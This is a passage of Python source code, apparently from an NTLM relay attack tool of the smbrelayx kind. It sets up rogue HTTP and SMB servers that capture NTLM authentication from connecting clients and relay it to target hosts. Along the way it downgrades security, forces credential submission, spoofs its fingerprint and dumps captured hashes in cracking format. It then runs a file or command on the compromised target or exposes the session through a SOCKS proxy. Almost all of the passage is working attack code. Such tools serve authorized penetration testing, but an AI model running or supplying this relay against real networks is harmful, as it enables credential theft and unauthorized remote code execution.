ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
logging.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
try:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.error(str(e))
pass
class SMBClient(SMB):
def __init__(self, remote_name, extended_security = True, sess_port = 445):
self._extendedSecurity = extended_security
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
def neg_session(self):
neg_sess = SMB.neg_session(self, extended_security = self._extendedSecurity)
return neg_sess
def setUid(self,uid):
self._uid = uid
def login_standard(self, user, domain, ansiPwd, unicodePwd):
smb = NewSMBPacket()
smb['Flags1'] = 8
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Data()
sessionSetup['Parameters']['MaxBuffer'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VCNumber'] = os.getpid()
sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey']
sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd)
sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd)
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
sessionSetup['Data']['AnsiPwd'] = ansiPwd
sessionSetup['Data']['UnicodePwd'] = unicodePwd
sessionSetup['Data']['Account'] = user
sessionSetup['Data']['PrimaryDomain'] = domain
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except:
logging.error("Error login_standard")
return None, STATUS_LOGON_FAILURE
else:
self._uid = smb['Uid']
return smb, STATUS_SUCCESS
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
if self._SignatureRequired is True:
if self.domainIp is None:
logging.error("Signature is REQUIRED on the other end, attack will not work")
else:
logging.info("Signature is REQUIRED on the other end, using NETLOGON approach")
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
logging.info("Connecting to %s NETLOGON service" % self.domainIp)
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'] )
_, machineAccount = self.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
logging.debug("Exception:", exc_info=True)
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.machineHashes) > 0:
lmhash, nthash = self.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount,'', domainName, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', '12345678')
serverChallenge = resp['ServerChallenge']
if self.machineHashes == '':
ntHash = None
else:
ntHash = unhexlify(self.machineHashes.split(':')[1])
sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00',
ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage[
'user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00'*8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except DCERPCException as e:
logging.debug('Exception:', exc_info=True)
logging.error(str(e))
return e.get_error_code()
logging.info("%s\\%s successfully validated through NETLOGON" % (
domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey']
logging.info("SMB Signing key: %s " % hexlify(signingKey))
self.set_session_key(signingKey)
self._SignatureEnabled = True
self._SignSequenceNumber = 2
self.set_flags(flags1 = SMB.FLAGS1_PATHCASELESS, flags2 = SMB.FLAGS2_EXTENDED_SECURITY)
return STATUS_SUCCESS
def sendAuth(self, serverChallenge, authenticateMessageBlob):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
smb['Uid'] = self._uid
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob)
sessionSetup['Data']['SecurityBlob'] = authenticateMessageBlob
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
errorCode = smb['ErrorCode'] << 16
errorCode += smb['_reserved'] << 8
errorCode += smb['ErrorClass']
if errorCode == STATUS_SUCCESS and self._SignatureRequired is True and self.domainIp is not None:
try:
errorCode = self.netlogonSessionKey(serverChallenge, authenticateMessageBlob)
except:
logging.debug('Exception:', exc_info=True)
raise
return smb, errorCode
def sendNegotiate(self, negotiateMessage):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Let's build a NegTokenInit with the NTLMSSP
# TODO: In the future we should be able to choose different providers
blob = SPNEGO_NegTokenInit()
# NTLMSSP
blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
blob['MechToken'] = negotiateMessage
sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)
sessionSetup['Parameters'].getData()
sessionSetup['Data']['SecurityBlob'] = blob.getData()
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except Exception:
logging.error("SessionSetup Error!")
raise
else:
# We will need to use this uid field for all future requests/responses
self._uid = smb['Uid']
# Now we have to extract the blob to continue the auth process
sessionResponse = SMBCommand(smb['Data'][0])
sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
sessionData.fromString(sessionResponse['Data'])
respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
return respToken['ResponseToken']
class HTTPRelayServer(Thread):
class HTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, server_address, RequestHandlerClass, target, exeFile, command, mode, outputFile,
one_shot, returnStatus=STATUS_SUCCESS, runSocks = False):
self.target = target
self.exeFile = exeFile
self.command = command
self.mode = mode
self.returnStatus = returnStatus
self.outputFile = outputFile
self.one_shot = one_shot
self.runSocks = runSocks
socketserver.TCPServer.__init__(self,server_address, RequestHandlerClass)
class HTTPHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self,request, client_address, server):
self.server = server
self.protocol_version = 'HTTP/1.1'
self.challengeMessage = None
self.target = None
self.client = None
self.machineAccount = None
self.machineHashes = None
self.domainIp = None
global ATTACKED_HOSTS
if self.server.target in ATTACKED_HOSTS and self.server.one_shot:
logging.info(
"HTTPD: Received connection from %s, skipping %s, already attacked" % (
client_address[0], self.server.target))
return
if self.server.target is not None:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], self.server.target))
else:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], client_address[0]))
http.server.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
def handle_one_request(self):
try:
http.server.SimpleHTTPRequestHandler.handle_one_request(self)
except Exception:
logging.debug("Exception:", exc_info=True)
pass
def log_message(self, format, *args):
return
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_AUTHHEAD(self, message = ''):
self.send_response(401)
self.send_header('WWW-Authenticate', message.decode('utf-8'))
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
def send_error(self, code, message=None):
if message.find('RPC_OUT') >=0 or message.find('RPC_IN'):
return self.do_GET()
return http.server.SimpleHTTPRequestHandler.send_error(self,code,message)
def do_GET(self):
messageType = 0
if PY2:
authorizationHeader = self.headers.getheader('Authorization')
else:
authorizationHeader = self.headers.get('Authorization')
if authorizationHeader is None:
self.do_AUTHHEAD(message = b'NTLM')
pass
else:
#self.do_AUTHHEAD()
typeX = authorizationHeader
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
if self.server.mode.upper() == 'REFLECTION':
self.target = self.client_address[0]
else:
self.target = self.server.target
try:
if self.client is not None:
logging.error('Still performing an attack against %s' % self.client.get_remote_host())
self.send_response(404)
self.end_headers()
return
self.client = SMBClient(self.target, extended_security = True)
self.client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
self.client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
clientChallengeMessage = self.client.sendNegotiate(token)
self.challengeMessage = NTLMAuthChallenge()
self.challengeMessage.fromString(clientChallengeMessage)
self.do_AUTHHEAD(message = b'NTLM '+base64.b64encode(clientChallengeMessage))
elif messageType == 3:
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '' or self.target == '127.0.0.1':
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = token
clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'],
respToken2.getData())
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials, except
# when coming from localhost
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
self.do_AUTHHEAD('NTLM')
else:
# Relay worked, do whatever we want here...
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.outputFile)
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
global ATTACKED_HOSTS
if self.target not in ATTACKED_HOSTS:
ATTACKED_HOSTS.add(self.target)
if self.server.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None,urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=self.client)
activeConnections.put(
(self.target, 445, 'SMB', ('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient,
{'CHALLENGE_MESSAGE': self.challengeMessage}))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
else:
clientThread = doAttack(self.client,self.server.exeFile,self.server.command)
self.client = None
clientThread.start()
else:
logging.error('%s is being attacker at the moment, skipping.. ' % self.target)
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
return
def __init__(self, outputFile=None):
Thread.__init__(self)
self.daemon = True
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.command = None
self.target = None
self.mode = None
self.outputFile = outputFile
self.one_shot = False
self.runSocks = False
def setTargets(self, target):
self.target = target
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Not implemented yet.
pass
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
def run(self):
logging.info("Setting up HTTP Server")
httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.command, self.mode,
self.outputFile, self.one_shot, runSocks = self.runSocks)
httpd.serve_forever()
class SMBRelayServer(Thread):
def __init__(self, outputFile = None):
Thread.__init__(self)
self.daemon = True
self.server = 0
self.target = ''
self.mode = 'REFLECTION'
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.returnStatus = STATUS_SUCCESS
self.command = None
self.one_shot = False
self.runSocks = False
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
if outputFile is not None:
smbConfig.set('global','jtr_dump_path',outputFile)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
self.server = SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.server.processConfigFile()
self.origSmbComNegotiate = self.server.hookSmbCommand(SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(SMB.SMB_COM_SESSION_SETUP_ANDX,
self.SmbSessionSetupAndX)
# Let's use the SMBServer Connection dictionary to keep track of our client connections as well
self.server.addConnection('SMBRelay', '0.0.0.0', 445)
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
if self.mode.upper() == 'REFLECTION':
self.target = connData['ClientIP']
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
if self.target in smbData:
# Remove the previous connection and use the last one
smbClient = smbData[self.target]['SMBClient']
del smbClient
del smbData[self.target]
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
else:
logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target))
try:
if recvPacket['Flags2'] & SMB.FLAGS2_EXTENDED_SECURITY == 0:
extSec = False
else:
if self.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
logging.info("Downgrading to standard security")
extSec = False
recvPacket['Flags2'] += (~SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
client = SMBClient(self.target, extended_security = extSec)
client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
else:
encryptionKey = client.get_encryption_key()
smbData[self.target] = {}
smbData[self.target]['SMBClient'] = client
if encryptionKey is not None:
connData['EncryptionKey'] = encryptionKey
smbServer.setConnectionData('SMBRelay', smbData)
smbServer.setConnectionData(connId, connData)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
#############################################################
def SmbSessionSetupAndX(self, connId, smbServer, smbCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
#############################################################
respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
global ATTACKED_HOSTS
if connData['_dialects_parameters']['Capabilities'] & SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = SMBSessionSetupAndX_Extended_Response_Parameters()
respData = SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
if unpack('B',sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
# It might happen if the target connects back before a previous connection has finished, we might
# get to this function w/o having the dict and smbClient entry created, because a
# NEGOTIATE_CONNECTION was not needed
if (self.target in smbData) is False:
smbData[self.target] = {}
smbClient = SMBClient(self.target)
smbClient.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
smbClient.set_timeout(60)
smbData[self.target]['SMBClient'] = smbClient
smbClient = smbData[self.target]['SMBClient']
clientChallengeMessage = smbClient.sendNegotiate(token)
challengeMessage = NTLMAuthChallenge()
challengeMessage.fromString(clientChallengeMessage)
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegState'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
# Let's store it in the connection data
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now the have the Auth token, let's send it
# back to the target system and hope for the best.
smbClient = smbData[self.target]['SMBClient']
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
clientResponse, errorCode = smbClient.sendAuth(connData['CHALLENGE_MESSAGE']['challenge'],
sessionSetupData['SecurityBlob'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
# del (smbData[self.target])
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
del (smbData[self.target])
else:
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile,self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Return status code of the authentication process.
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegState'] = b'\x00'
# Status SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
respParameters = SMBSessionSetupAndXResponse_Parameters()
respData = SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = SMBSessionSetupAndX_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
#############################################################
# SMBRelay
smbClient = smbData[self.target]['SMBClient']
if sessionSetupData['Account'] != '':
clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'],
sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'],
sessionSetupData['UnicodePwd'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
ntlm_hash_data = outputToJohnFormat(b'', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
sessionSetupData['PrimaryDomain'],
sessionSetupData['Account'])).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
else:
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
clientThread = doAttack(smbClient, self.exeFile, self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Do the verification here, for just now we grant access
# TODO: Manage more UIDs for the same session
errorCode = self.returnStatus
